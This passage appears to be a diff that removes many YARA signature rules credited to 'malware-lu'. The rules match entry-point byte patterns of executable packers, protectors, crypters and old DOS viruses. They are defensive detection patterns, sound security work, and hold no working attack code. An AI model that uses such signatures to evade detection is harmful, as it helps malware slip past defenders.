-		$a0 = { E8 E3 40 00 00 E9 16 FE FF FF 6A 0C 68 ?? ?? ?? ?? E8 44 15 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 36 13 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 C7 12 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 48 11 00 00 59 89 7D FC FF 75 08 E8 01 49 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 66 D3 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 AF F9 FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 EE 0F 00 00 59 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SLVc0deProtector060SLVICU
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD }
-
-condition:
-		$a0
-}
-	
-	
-rule Kryptonv03
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 0C 24 E9 C0 8D 01 ?? C1 3A 6E CA 5D 7E 79 6D B3 64 5A 71 EA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrackStopv101cStefanEsser1997
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 48 BB FF FF B9 EB 27 8B EC CD 21 FA FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Kryptonv05
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 71 44 ?? ?? 2B 85 64 60 ?? ?? EB 43 DF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Kryptonv04
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 61 34 ?? ?? 2B 85 60 37 ?? ?? 83 E8 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PassLock2000v10EngMoonlightSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv029Betav031BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 }
-
-condition:
-		$a0
-}
-	
-	
-rule AlexProtector10beta2byAlex
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B 44 24 0C EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 83 80 B8 00 00 00 02 33 C0 EB 01 E9 C3 58 83 C4 04 EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 50 64 FF 35 00 00 00 00 64 89 25 }
-
-condition:
-		$a0
-}
-	
-	
-rule MoleBoxv254Teggo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 8B 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 24 61 58 58 FF D0 E8 ?? ?? 00 00 6A 00 FF 15 ?? ?? ?? 00 CC CC CC CC CC CC CC CC CC CC CC CC CC CC }
-
-condition:
-		$a0
-}
-	
-	
-rule InstallShield2000
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 C4 ?? 53 56 57 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1337ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinv03Engcyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 }
-	$a1 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02PEPack099Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxVCL
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { AC B9 00 80 F2 AE B9 04 00 AC AE 75 ?? E2 FA 89 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VterminalV10XLeiPeng
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 05 ?? ?? ?? ?? 9C 50 C2 04 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEEncrypt10Liwuyue
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D 0F 05 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 5D EC 8B 41 18 8B C8 49 85 C9 72 5A 41 33 C0 8B D8 C1 E3 02 03 DA 8B 3B 03 3E 81 3F 47 65 74 50 75 40 8B DF 83 C3 04 81 3B 72 6F 63 41 75 33 8B DF 83 C3 08 81 3B 64 64 72 65 75 26 83 C7 0C 66 81 3F 73 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InstallAnywhere61ZeroGSoftwareInc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
-	$a1 = { 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule iLUCRYPTv4018exe
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B EC FA C7 ?? ?? ?? ?? 4C 4C C3 FB BF ?? ?? B8 ?? ?? 2E ?? ?? D1 C8 4F 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02ASProtectAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPEV22006710WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 }
-	$a1 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Themida10xx18xxnocompressionOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }
-	$a1 = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule StonesPEEncryptorv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 63 3A 40 ?? 2B 95 C2 3A 40 ?? 83 EA 0B 89 95 CB 3A 40 ?? 8D B5 CA 3A 40 ?? 0F B6 36 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PolyBoxDAnskya
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 33 C9 51 51 51 51 51 53 33 C0 55 68 84 2C 40 00 64 FF 30 64 89 20 C6 45 FF 00 B8 B8 46 40 00 BA 24 00 00 00 E8 8C F3 FF FF 6A 24 BA B8 46 40 00 8B 0D B0 46 40 00 A1 94 46 40 00 E8 71 FB FF FF 84 C0 0F 84 6E 01 00 00 8B 1D D0 46 40 00 8B C3 83 C0 24 03 05 D8 46 40 00 3B 05 B4 46 40 00 0F 85 51 01 00 00 8D 45 F4 BA B8 46 40 00 B9 10 00 00 00 E8 A2 EC FF FF 8B 45 F4 BA 9C 2C 40 00 E8 F1 ED FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule Mew10execoder10NorthfoxHCC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECrypt102
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DIETv100d
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 06 1E 0E 8C C8 01 ?? ?? ?? BA ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV119LZMA430ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ENIGMAProtectorV112SukhovVladimir
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 C5 FA 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeASPack212FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MacromediaWindowsFlashProjectorPlayerv50
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 44 56 FF 15 70 61 44 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C 3C 20 7E 08 8A 46 01 46 3C 20 7F F8 8A 06 84 C0 74 0C 3C 20 7F 08 8A 46 01 46 84 C0 75 F4 8D 44 24 04 C7 44 24 30 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule IDApplicationProtector12IDSecuritySuite
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED F2 0B 47 00 B9 19 22 47 00 81 E9 EA 0E 47 00 89 EA 81 C2 EA 0E 47 00 8D 3A 89 FE 31 C0 E9 D3 02 00 00 CC CC CC CC E9 CA 02 00 00 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 6F 66 74 57 61 72 65 50 72 6F 74 65 63 74 6F 72 5C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4ExtractablePasswordchecking
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 80 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HASPHLProtectionV1XAladdin
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 }
-	$a1 = { 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 15 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule ASProtectv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov275a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 68 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner0132Lite003Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 ?? ?? ?? ?? E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxDoom666
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? 5E 83 EE ?? B8 CF 7B CD 21 3D CF 7B ?? ?? 0E 1F 81 C6 ?? ?? BF ?? ?? B9 ?? ?? FC F3 A4 06 1F 06 B8 ?? ?? 50 CB B4 48 BB 2C 00 CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxSpanz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 5E 81 EE ?? ?? 8D 94 ?? ?? B4 1A CD 21 C7 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BeRoEXEPackerv100DLLLZBRSBeRoFarbrausch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pksmart10b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? 8C C8 8B C8 03 C2 81 ?? ?? ?? 51 B9 ?? ?? 51 1E 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PELockv106
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LaunchAnywherev4001
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 83 EC 48 55 B8 FF FF FF FF 50 50 68 E0 3E 42 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 C0 69 44 00 E8 E4 80 FF FF 59 E8 4E 29 00 00 E8 C9 0D 00 00 85 C0 75 08 6A FF E8 6E 2B 00 00 59 E8 A8 2C 00 00 E8 23 2E 00 00 FF 15 4C C2 44 00 89 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv033v034BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule GameGuardnProtect
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE ?? ?? ?? ?? 31 FF 74 06 61 E9 4A 4D 50 30 8D BE ?? ?? ?? ?? 31 C9 74 06 61 E9 4A 4D 50 30 B8 7D 00 00 00 39 C2 B8 4C 00 00 00 F7 D0 75 3F 64 A1 30 00 00 00 85 C0 78 23 8B 40 0C 8B 40 0C C7 40 20 00 10 00 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 85 C0 75 16 E9 12 00 00 00 31 C0 64 A0 20 00 00 00 85 C0 75 05 E9 01 00 00 00 61 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorV1032AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 94 73 42 00 8B D5 81 C2 E3 73 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 BF A4 42 00 81 E9 8E 74 42 00 8B D5 81 C2 8E 74 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 63 29 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule nBinderv40
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5C 6E 62 34 5F 74 6D 70 5F 30 31 33 32 34 35 34 33 35 30 5C 00 00 00 00 00 00 00 00 00 E9 55 43 4C FF 01 1A 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 8F F4 6A 70 35 A5 63 E9 A3 95 64 9E 32 88 DB 0E A4 B8 DC 79 }
-
-condition:
-		$a0
-}
-	
-	
-rule AnslymFUDCrypter
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EPExEPackV10EliteCodingGroup
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePack12build3009Method2bagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 5A 90 EB 01 00 52 E9 86 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule WinZip32bitSFXv6xmodule
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF 15 ?? ?? ?? 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 38 08 74 06 40 80 38 00 75 F6 80 38 00 74 01 40 33 C9 ?? ?? ?? ?? FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxEinstein
-{
-      meta:
-		author="malware-lu"
-strings:
